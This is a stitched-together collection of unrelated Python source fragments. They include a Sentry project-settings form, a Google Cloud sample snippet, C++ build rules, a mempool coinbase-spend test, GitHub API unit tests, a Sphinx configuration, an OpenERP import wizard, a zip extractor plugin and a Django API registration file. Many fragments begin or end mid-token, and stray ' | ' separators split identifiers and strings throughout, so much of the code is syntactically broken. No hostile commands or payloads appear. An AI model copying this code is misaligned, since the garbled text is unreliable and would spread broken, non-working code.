raise forms.ValidationError('Unable to fi | nd chosen team')
def clean_slug(self):
slug = self. | cleaned_data.get('slug')
if not slug:
return
other = Project.objects.filter(
slug=slug, organization=self.organization
).exclude(id=self.instance.id).first()
if other is not None:
raise forms.ValidationError(
'Another project (%s) is already '
'using that slug' % other.name
)
return slug
def clean_token(self):
token = self.cleaned_data.get('token')
if not token:
return
token_re = r'^[-a-zA-Z0-9+/= ]{1,255}$'
if not re.match(token_re, token):
raise forms.ValidationError('Invalid security token, must be: %s' % token_re)
return token
def clean_token_header(self):
token_header = self.cleaned_data.get('token_header')
if not token_header:
return
header_re = r'^[a-zA-Z0-9-]{1,20}$'
if not re.match(header_re, token_header):
raise forms.ValidationError('Invalid header value, must be: %s' % header_re)
return token_header
class ProjectSettingsView(ProjectView):
required_scope = 'project:write'
def get_form(self, request, project):
organization = project.organization
team_list = [
t for t in Team.objects.get_for_user(
organization=organization,
user=request.user,
) if request.access.has_team_scope(t, self.required_scope)
]
# TODO(dcramer): this update should happen within a lock
security_token = project.get_option('sentry:token', None)
if security_token is None:
security_token = uuid1().hex
project.update_option('sentry:token', security_token)
return EditProjectForm(
request,
organization,
team_list,
request.POST or None,
instance=project,
initial={
'origins':
'\n'.join(project.get_option('sentry:origins', ['*'])),
'token':
security_token,
'token_header':
project.get_option('sentry:token_header'),
'verify_ssl':
bool(project.get_option('sentry:verify_ssl', False)),
'resolve_age':
int(project.get_option('sentry:resolve_age', 0)),
'scrub_data':
bool(project.get_option('sentry:scrub_data', True)),
'scrub_defaults':
bool(project.get_option('sentry:scrub_defaults', True)),
'sensitive_fields':
'\n'.join(project.get_option('sentry:sensitive_fields', None) or []),
'safe_fields':
'\n'.join(project.get_option('sentry:safe_fields', None) or []),
'scrub_ip_address':
bool(project.get_option('sentry:scrub_ip_address', False)),
'scrape_javascript':
bool(project.get_option('sentry:scrape_javascript', True)),
'default_environment':
project.get_option('sentry:default_environment'),
'mail_subject_prefix':
project.get_option('mail:subject_prefix', options.get('mail.subject-prefix')),
},
)
def handle(self, request, organization, team, project):
form = self.get_form(request, project)
if form.is_valid():
project = form.save()
for opt in (
'origins', 'token', 'token_header', 'verify_ssl', 'resolve_age', 'scrub_data',
'scrub_defaults', 'sensitive_fields', 'safe_fields', 'scrub_ip_address',
'scrape_javascript', 'default_environment', 'mail_subject_prefix',
):
opt_key = 'sentry:{}'.format(opt)
# Value can't be overridden if set on the org level
if opt in form.org_overrides and organization.get_option(opt_key, False):
continue
if opt == 'mail_subject_prefix':
key = 'mail:subject_prefix'
else:
key = 'sentry:%s' % (opt, )
value = form.cleaned_data.get(opt)
if value is None:
project.delete_option(key)
else:
project.update_option(key, value)
self.create_audit_entry(
request,
o |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ReadTensorboardBlobData
# NOTE: This snippet has been automatically generated for illust | rative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_v1_generated_TensorboardService_ReadTensorboardBlobData_sync]
from google.cloud import aiplatform_v1
def sample_read_tensorboard_blob_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument | (s)
request = aiplatform_v1.ReadTensorboardBlobDataRequest(
time_series="time_series_value",
)
# Make the request
stream = client.read_tensorboard_blob_data(request=request)
# Handle the response
for response in stream:
print(response)
# [END aiplatform_v1_generated_TensorboardService_ReadTensorboardBlobData_sync]
|
ude=None, define=None, flags=None, headers=None,
compiler=None, warnings_are_errors=False, scan=True, msvc_lib=False,
debug=True, linkflags=None
):
if compiler is None:
compiler, toolchain = _get_default_compiler()
else:
toolchain = _get_toolchain(compiler)
if toolchain is None:
raise ValueError('toolchain could not be detected')
if headers is None:
headers = []
linkflags = list(linkflags) if linkflags else []
if flags is None:
flags = []
if toolchain is GNU:
flags.append('-fPIC')
if define is None:
define = {}
define['DLL_EXPORT'] = 1
objects = []
for source in sources:
obj = object(
sources=[source],
compiler=compiler,
scan=scan,
include=include,
define=define,
flags=flags,
error_warnings=warnings_are_errors,
debug=debug
)
objects.append(obj.output)
if toolchain is MSVC:
lib = name + '.lib'
if msvc_lib:
lib = core.build(lib)
else:
lib = core.intermediate(lib)
name = core.build(name + '.dll')
else:
lib = None
head, tail = os.path.split(name)
name = core.build(os.path.join(head, 'lib' + tail + '.so'))
yield core.publish(
inputs=objects,
message='Shared {}'.format(name),
outputs=[name, lib] if lib else [name],
result={
'type': 'cpp.shared_library',
'msvc_lib': core.absolute(lib),
'headers': core.absolute(core.resolve(headers)),
'output': core.absolute(name)
},
check=linkflags
)
if toolchain is GNU:
command = [compiler, '-shared', '-o', name]
command.extend(objects)
command.append('-Wl,-soname,' + os.path.basename(name))
command.extend(linkflags)
core.call(command)
elif toolchain is MSVC:
command = [compiler, '/Fe' + name, '/nologo', '/LD']
command.extend(objects)
command.extend(linkflags)
core.call(command, env=_msvc_get_cl_env(compiler))
base = os.path.splitext(name)[0]
if not msvc_lib:
origin = base + '.lib'
if os.path.isfile(lib):
os.remove(lib)
os.rename(origin, lib)
os.remove(base + '.exp')
else:
raise NotImplementedError
@core.rule
def object(
name=None, sources=None, include=None, define=None, flags=None,
compiler=None, error_warnings=False, scan=True, debug=True, depend=None
):
if isinstance(sources, str):
raise TypeError('sources must not be a string - try to use a list')
if not sources:
raise ValueError('sources must not be empty')
sources = core.resolve(sources)
include = list(include) if include else []
define = dict(define) if define else {}
flags = list(flags) if flags else []
depend = list(depend) if depend else []
if compiler is None:
compiler, toolchain = _get_default_compiler()
else:
toolchain = _get_toolchain(compiler)
if toolchain is None:
raise ValueError('toolchain could not be detected')
if name is None:
name = core.intermediate(core.checksum(
core.absolute(sources), compiler)[:16])
else:
name = core.build(name)
if toolchain is GNU:
name += '.o'
elif toolchain is MSVC:
name += '.obj'
yield core.publish(
inputs=sources + [compiler] + depend,
message='Compile ' + ', '.join(sources),
outputs=[name],
check=[include, define, flags, error_warnings, scan, debug],
result={
'type': 'cpp.object',
'include': include,
'define': define,
'flags': flags,
'compiler': compiler,
}
)
for identifier, value in define.items():
if isinstance(value, str):
define[identifier] = '"{}"'.format(value)
elif value is True:
define[identifier] = 'true'
elif value is False:
define[identifier] = 'false'
elif isinstance(value, (int, float)):
pass
else:
raise TypeError('unsupported define type: {}'.format(type(value)))
if toolchain is GNU:
command = [compiler, '-c', '-o', name, '-x', 'c++', '-std=c++11']
command.extend(sources)
for directory in include:
command.extend(['-I', directory])
# Enable most warnings. Option to change this?
command.append('-Wall')
if error_warnings:
command.append('-Werror')
if debug:
command.append('-g')
else:
command.append('-O3')
| command.append('-D | NDEBUG')
for identifier, value in define.items():
command.append('-D{}={}'.format(identifier, value))
if scan:
depfile = core.temporary(core.random('.d'))
command.extend(['-MD', '-MF', depfile])
else:
depfile = None
if _gnu_supports_colors(compiler):
command.append('-fdiagnostics-color')
command.extend(flags)
output = core.call(command)
if scan:
# TODO: Good parsing.
with open(depfile) as file:
content = file.read()
used = {
os.path.abspath(x) for x in
content[content.find(':')+1:].replace('\\\n', '\n').split()
}
# TODO: No difference!!
used.difference_update(core.absolute(sources))
used.difference_update(core.absolute(depend))
else:
used = None
yield core.deposit(inputs=used, warnings=output or None)
elif toolchain is MSVC:
command = [compiler, '/c', '/Fo' + name, '/nologo']
command.extend(sources)
for directory in include:
command.extend(['/I' + directory])
if scan:
command.append('/showIncludes')
for identifier, value in define.items():
command.append('/D{}={}'.format(identifier, value))
# TODO: Option to set c++ standard.
# command.append('/std:' + standard)
# TODO: Figure out debug / relase
# === DEBUG ===
# command.append('/ZI') Enable nice debug mode?
# command.append('/Od') Disable optimizations for debug
# command.append('/Gm') Enable minimal rebuild?
# command.append('/RTC1') Run-time error checks
# /MDd
# === RELEASE ===
# command.append('/Ox') Full Optimization or /Oi?
# /Zi Debug information
# /GL Breaks object-linking? Whole prog optimization
# command.append('/O2') Optimize for speed
command.append('/W4') # Enable most warnings.
if error_warnings:
command.append('/WX') # All warnings as errors.
command.append('/EHsc') # Specify exception handling model
command.append('/sdl') # Additional security warnings
command.append('/TP') # Assume C++ sources
command.extend(flags)
try:
output = core.call(command, env=_msvc_get_cl_env(compiler))
except core.CallError as exc:
exc.output = _msvc_strip_includes(exc.output)
raise
if scan:
used = _msvc_extract_includes(output)
else:
used = None
yield core.deposit(
inputs=used,
warnings=_msvc_strip_includes(output).strip() or None
)
def find_static_library(name):
if core.windows:
return _find('{}.lib'.format(name))
else:
return _find('lib{}.a'.format(name))
def find_shared_library(name):
if core.windows:
return _find('{}.dll'.format(name))
else:
return _find('lib{}.so'.format(name))
def get_default_toolchain():
return _get_default_compiler()[1]
GNU = 'GNU'
MSVC = 'MSVC'
def _find(name):
if core.windows:
env = _msvc_get_cl_env(_get_default_comp |
from scrapy.contrib.exporter import CsvItemExporter
from scrapy.conf import settings
class SlybotCSVItemExporter(CsvItemEx | porter):
def __init__(self, *args, **kwargs):
kwargs['fields_to_export'] = settings.getlist('CSV_E | XPORT_FIELDS') or None
super(SlybotCSVItemExporter, self).__init__(*args, **kwargs)
|
#!/usr/bin/en | v python2.7
import sys
for line in open(sys.argv[1]):
cut=line.split('\t')
if len | (cut)<11: continue
print ">"+cut[0]
print cut[9]
print "+"
print cut[10]
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Stardust Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test spending coinbase transactions.
# The coinbase transaction in block N can appear in block
# N+100... so is valid in the mempool when the best block
# height is N+99.
# This test makes sure coinbase spends that will be mature
# in the next block are accepted into the memory pool,
# but less mature coinbase spends are NOT.
#
from test_framework.test_framework import StardustTestFra | mework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolSpendCoinbaseTest(StardustTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
| self.is_network_split = False
def run_test(self):
chain_height = self.nodes[0].getblockcount()
assert_equal(chain_height, 200)
node0_address = self.nodes[0].getnewaddress()
# Coinbase at height chain_height-100+1 ok in mempool, should
# get mined. Coinbase at height chain_height-100+2 is
# is too immature to spend.
b = [ self.nodes[0].getblockhash(n) for n in range(101, 103) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.99) for txid in coinbase_txids ]
spend_101_id = self.nodes[0].sendrawtransaction(spends_raw[0])
# coinbase at height 102 should be too immature to spend
assert_raises(JSONRPCException, self.nodes[0].sendrawtransaction, spends_raw[1])
# mempool should have just spend_101:
assert_equal(self.nodes[0].getrawmempool(), [ spend_101_id ])
# mine a block, spend_101 should get confirmed
self.nodes[0].generate(1)
assert_equal(set(self.nodes[0].getrawmempool()), set())
# ... and now height 102 can be spent:
spend_102_id = self.nodes[0].sendrawtransaction(spends_raw[1])
assert_equal(self.nodes[0].getrawmempool(), [ spend_102_id ])
if __name__ == '__main__':
MempoolSpendCoinbaseTest().main()
|
import unittest
from unittest.mock import patch
from app.main.service import GitHubUserService
@patch("app.main.service.github")
class TestGitHubUserService(unittest.TestCase):
def setUp(self):
self.test_user = "test"
self.retrieved_repos_return = [
{
"fork": False,
"name": "test_non_fork",
"pull_url": "http://localhost/non_fork/pulls",
"url": "https://localhost/non_fork",
"full_name": self.test_user + "/test_non_fork",
"html_url": "https://localhost"
},
{
"fork": True,
"name": "test_fork",
"full_name": self.test_user + "/test_fork",
"url": "https://localhost/child",
"html_url": "https://localhost",
"parent": {
"fork": False,
"name": "parent",
"url": "http://parent",
"full_name": self.test_user + "1/test_parent",
"pull_url": "https://localhost/parent/pulls",
"html_url": "https://localhost/parent"
}
}
]
def test_search_for_users_error(self, github_client):
message = "too many"
github_client.search_for_user.return_value = {"error": message}
assert GitHubUserService.search_for_user("nobody") == message
def test_search_for_users_success(self, github_client):
github_client_return = [{
"avatar_url": "test",
"repos_url": "http://localhost",
"html_url": "https://localhost",
"login": "nobody"
}]
github_client.search_for_user.return_value = github_client_return
found_users = GitHubUserService.search_for_users("nobody")
self.assertEqual(found_users[0].avatar_url, github_client_return[0]["avatar_url"])
self.assertEqual(found_users[0].repos_url, github_client_return[0]["repos_url"])
self.assertEqual(found_users[0].url, github_client_return[0]["html_url"])
self.assertEqual(found_users[0].login, github_client_return[0]["login"])
def test_retrieve_repos_if_fork_with_pr(self, github_client):
def local_mock_retrieve_pulls(url, state):
pulls = [
{
"html_url": "https://localhost/parent/pulls",
"title": "test title",
"user": {
"login": self.test_user
}
}
]
if "parent" in url:
return pulls
else:
pulls[0]["html_url"] = self.retrieved_repos_return[0]["html_url"]
return pulls
# mocks
github_client.retrieve_repos.return_value = self.retrieved_repos_return
github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
github_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
actual_repos = GitHubUserService.retrieve_repos(self.test_user)
self.assertEqual(2, len(actual_repos))
for repo in actual_repos:
if repo.is_fork:
self.assertTrue("parent" in
repo.pull_requests[0].url,
"The parent pulls are not in the repo: {}"
.format(repo.name))
def test_retrieve_repos_if_fork_without_pr(self, github_client):
def local_mock_retrieve_pulls(url, state):
pulls = [
{
"html_url": "https://localhost/parent/pulls",
"title": "test title",
"user": {
"login": self.test_user
}
}
]
if "parent" in url:
return []
else:
pulls[0]["html_url"] = self.retrieved_repos_return[0]["html_url"]
return pulls
# mocks
github_client.retrieve | _repos.return_value = self.retrieved_repos_return
github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
g | ithub_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
actual_repos = GitHubUserService.retrieve_repos(self.test_user)
for repo in actual_repos:
if repo.is_fork:
self.assertIsNone(repo.pull_requests,
"The parent pulls are not in the repo: {}"
.format(repo.name))
def test_retrieve_repos_if_source_with_pr(self, github_client):
def local_mock_retrieve_pulls(url, state):
pulls = [
{
"html_url": "https://localhost/non_fork/pulls",
"title": "test title",
"user": {
"login": self.test_user
}
}
]
return pulls
# mocks
github_client.retrieve_repos.return_value = self.retrieved_repos_return
github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
github_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
actual_repos = GitHubUserService.retrieve_repos(self.test_user)
self.assertEqual(2, len(actual_repos))
for repo in actual_repos:
if not repo.is_fork:
self.assertTrue("non_fork" in
repo.pull_requests[0].url,
"The non_fork pulls are not in the repo: {}"
.format(repo.name))
def test_retrieve_repos_if_source_without_pr(self, github_client):
def local_mock_retrieve_pulls(url, state):
return []
# mocks
github_client.retrieve_repos.return_value = self.retrieved_repos_return
github_client.retrieve_repo.side_effect = self.mock_retrieve_repo
github_client.retrieve_pulls.side_effect = local_mock_retrieve_pulls
actual_repos = GitHubUserService.retrieve_repos(self.test_user)
self.assertEqual(2, len(actual_repos))
for repo in actual_repos:
if not repo.is_fork:
self.assertIsNone(repo.pull_requests,
"The non_fork pulls are not in the repo: {}"
.format(repo.name))
# -----------------helper mock functions--------------------
def mock_retrieve_repo(self, url):
if "non_fork" in url:
return self.retrieved_repos_return[0]
elif "parent" in url:
return self.retrieved_repos_return[1]["parent"]
else:
return self.retrieved_repos_return[1]
def mock_retrieve_pulls(self, url, state):
pulls = [
{
"html_url": "https://localhost/parent/pulls",
"title": "test title",
"user": {
"login": self.test_user
}
}
]
if "parent" in url:
return pulls
else:
pulls[0]["html_url"] = self.retrieved_repos_return[0]["html_url"]
return pulls
if __name__ == '__main__':
unittest.main()
|
import _plot | ly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="bgcolorsrc", parent_name="histogram.marker.pattern", **kwargs
):
super(BgcolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
) | |
: utf-8 -*-
#
# sympa documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 25 18:11:49 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from datetime import date
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sympa'
copyright = u'%s, Direction Informatique' % date.today().strftime("%Y")
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# | pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain | custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sympadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'sympa.tex', u'sympa Documentation',
u'Direction Informatique', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sympa', u'sympa Documentation',
[u'Direction Informatique'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sympa', u'sympa Documentation',
u'Direction Informatique', 'sympa', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append |
from distutils.core import setup
setup(
# Application name:
name="streaker",
# Version number (initial):
ver | sion="0.0.1",
# Application author details:
author="Aldi Alimucaj",
author_email="aldi.alimucaj@gmail.com",
# Packages
packages=["streaker"],
scripts=['bin/streaker'],
# Include additional files into the package
include_package_data=True,
# Details
url="http://pypi.python.org/pypi/Streaker_v001/",
#
license="MIT",
descri | ption="GitHub streak manipulator",
# long_description=open("README.txt").read(),
# Dependent packages (distributions)
install_requires=[
# "",
],
)
|
# -*- coding: utf-8 -*-
##############################################################################
#
# document_csv module for OpenERP, Import structure in CSV
# Copyright (C) 2011 SYLEAM (<http://www.syleam.fr/>)
# | Christophe CHAUVET <christophe.chauvet@syleam.fr>
# Copyright (C) 2011 Camptocamp (http://www.camptocamp.com)
# Guewen Baconnier
#
# This file is a part of document_csv
#
# document_csv is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# document_csv | is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv
from osv import fields
class LaunchImport(osv.osv_memory):
_name = 'wizard.launch.import.csv'
_description = 'Interface to launch CSV import'
_rec_name = 'import_list'
def _import_list(self, cr, uid, context=None):
implist_obj = self.pool.get('document.import.list')
doc_ids = implist_obj.search(cr, uid, [('disable', '=', False)])
if doc_ids:
return [(x.id, x.name) for x in implist_obj.browse(cr, uid, doc_ids, context=context)]
return []
_columns = {
'import_list': fields.selection(_import_list, 'List', help='List of available import structure', required=True),
'import_file': fields.binary('Filename', required=True),
'lang_id': fields.many2one('res.lang', 'Language', help='Translation to update.'),
'email_result': fields.char('Email', size=256, help='Email to send notification when import is finished'),
}
def default_get(self, cr, uid, fields_list, context=None):
"""
Retrieve email for this user
"""
if context is None:
context = {}
res = super(LaunchImport, self).default_get(cr, uid, fields_list, context=context)
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
res['email_result'] = user.user_email or ''
if context.get('lang'):
res['lang_id'] = self.pool.get('res.lang').search(cr, uid, [('code', '=', context['lang'])], context=context)
return res
def launch_import(self, cr, uid, ids, context=None):
"""
Save file, and execute importation
"""
if context is None:
context = {}
cur = self.browse(cr, uid, ids[0], context=context)
ctx = context.copy()
if cur.lang_id:
ctx.update({'lang': cur.lang_id.code})
self.pool.get('ir.attachment').import_csv(cr, uid, int(cur.import_list), cur.import_file, cur.email_result, context=ctx)
return {'type': 'ir.actions.act_window_close'}
LaunchImport()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
from sklearn.cluster import MiniBatchKMeans
import numpy as np
import json
import os
from texta.settings import MODELS_DIR
class WordCluster(object):
"""
WordCluster object to cluster Word2Vec vectors using MiniBatchKMeans.
: param embedding : Word2Vec object
: param n_clusters, int, number of clusters in output
"""
def __init__(self):
self.word_to_cluster_dict = {}
self.cluster_dict = {}
def cluster(self, embedding, n_clusters=None):
vocab = list(embedding.wv.vocab.keys())
vocab_vectors = np.array([embedding[word] for word in vocab])
if not n_clusters:
# number of clusters = 10% of embedding vocabulary
# if larger than 1000, limit to 1000
n_clusters = int(len(vocab) * 0.1)
if n_clusters > 1000:
n_clusters = 1000
clustering = MiniBatchKMeans(n_clusters=n_clusters).fit(vocab_vectors)
cluster_labels = clustering.labels_
for i,cluster_label in enumerate(cluster_labels):
word = vocab[i]
etalon = embedding.wv.most_similar(positive=[clustering.cluster_centers_[cluster_label]])[0][0]
if etalon not in self.cluster_dict:
self.cluster_dict[etalon] = []
self.cluster_dict[etalon].append(word)
self.word_to_cluster_dict[word] = etalon
return True
def query(self, word):
try:
return self.cluster_dict[self.word_to_cluster_dict[word]]
except:
return []
def text_to_clusters(self, text):
text = [str(self.word_to_cluster_dict[word]) for word in text if word in self.word_to_cluster_dict]
return ' '.join(text)
def save(self, file_path):
try:
data = {"word_to_cluster_dict": self.word_to_cluster_dict, "cluster_dict": self.cluster_dict}
with open(file_path, 'w') as fh:
fh.write(json.dumps(data))
return True
except:
return False
def load(self, unique_id, task_type='train_tagger'):
file_path = os.path.join(MODELS_DIR, task_type, 'clus | ter_{}'.format(unique_id))
try:
with open(file_path) as fh:
data = json.loads(fh.read())
self.cluster_dict = data["cluster_dict"]
self.word_to_cluster_dict = data["word_to_cluster_dict"]
except:
| return False
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
import os
import sys
import zipfile
from pyload.plugin.Extractor import Extractor, ArchiveError, CRCError, PasswordError
from pyload.utils import fs_encode
class UnZip(Extractor):
__name = "UnZip"
__type = "extractor"
__version = "1.12"
__description = """Zip extractor plugin"""
__license = "GPLv3"
__authors = [("Walter Purcaro", "vuolter@gmail.com")]
EXTENSIONS = [".zip", ".zip64"]
NAME = __name__.rsplit('.', 1)[1]
VERSION = "(python %s.%s.%s)" % (sys.version_info[0], sys.version_info[1], sys.version_info[2])
@classmethod
def isUsable(cls):
return sys.version_info[:2] >= (2, 6)
def list(self, password=None):
with zipfile.ZipFile(fs_encode(self.filename), 'r', allowZip64=True | ) as z:
z.setpassword(password)
return z.namelist()
def check(self, password):
pass
def verify(self):
with zipfile.ZipFile(fs_encode(self.filename), 'r', allowZip64=True) as z:
badfile = z.testzip()
if badfile:
raise CRCError(badfile)
else:
raise PasswordError
def extract(self, password=None):
try:
with zipfile.Zip | File(fs_encode(self.filename), 'r', allowZip64=True) as z:
z.setpassword(password)
badfile = z.testzip()
if badfile:
raise CRCError(badfile)
else:
z.extractall(self.out)
except (zipfile.BadZipfile, zipfile.LargeZipFile), e:
raise ArchiveError(e)
except RuntimeError, e:
if "encrypted" in e:
raise PasswordError
else:
raise ArchiveError(e)
else:
self.files = z.namelist()
|
# https://leetcode.com/problems/linked-lis | t-cycle-ii/
from ListNode import ListNode
class Solution(object):
def detectCycle(self, head):
slow,fast = head,head
while True:
if fast == None or fast.next == None : return None
slow = slow.next
fast = fast.next.next
if slow == fast :
break
while head != fast:
head = he | ad.next
fast = fast.next
return head |
from pycse.lisp im | port *
def test_symbol():
assert Symbol('setf').lisp == 'setf'
def test_quote():
assert Quote('setf').lisp == "'setf"
def test_sharpquote():
assert SharpQuote('setf').lisp == "#'setf"
def test_cons():
assert Cons('a', 3).lisp == '("a" . 3)'
def test_Alist():
assert Alist(["a", 1, "b", 2]).lisp == '(("a" . 1) ("b" . 2))'
def test_vector():
assert Vector(["a", 1, 3]).lisp == '["a" 1 3]'
def test_Comma():
assert Comma(Symbol("setf")).lisp == ',setf'
| def test_splice():
assert Splice([1, 3]).lisp == ',@(1 3)'
def test_backquote():
assert Backquote([Symbol("a"), 1]).lisp == '`(a 1)'
def test_comment():
assert Comment(Symbol("test")).lisp == '; test'
|
from django.conf.urls.defaults import *
from tastypie.api import Api
#from tastytools.api import Api
from base.api import BaseResource
from bcmon.api import PlayoutResource as BcmonPlayoutResource
from bcmon.api import ChannelResource as BcmonChannelResource
from alibrary.api import MediaResource, ReleaseResource, ArtistResource, LabelResource, SimplePlaylistResource, PlaylistResource, PlaylistItemPlaylistResource
from importer.api import ImportResource, ImportFileResource
from exporter.api import ExportResource, ExportItemResource
from abcast.api import StationResource, ChannelResource, JingleResource, JingleSetResource, EmissionResource
from abcast.api import BaseResource as AbcastBaseResource
from istats.api import StatsResource
from fluent_comments.api import CommentResource
api = Api()
# base
api.register(BaseResource())
# bcmon
api.register(BcmonPlayoutResource())
api.register(BcmonChannelResource())
# library
api.register(M | ediaResource())
api.register(ReleaseResource())
api.register(ArtistResource())
api.register(LabelResource())
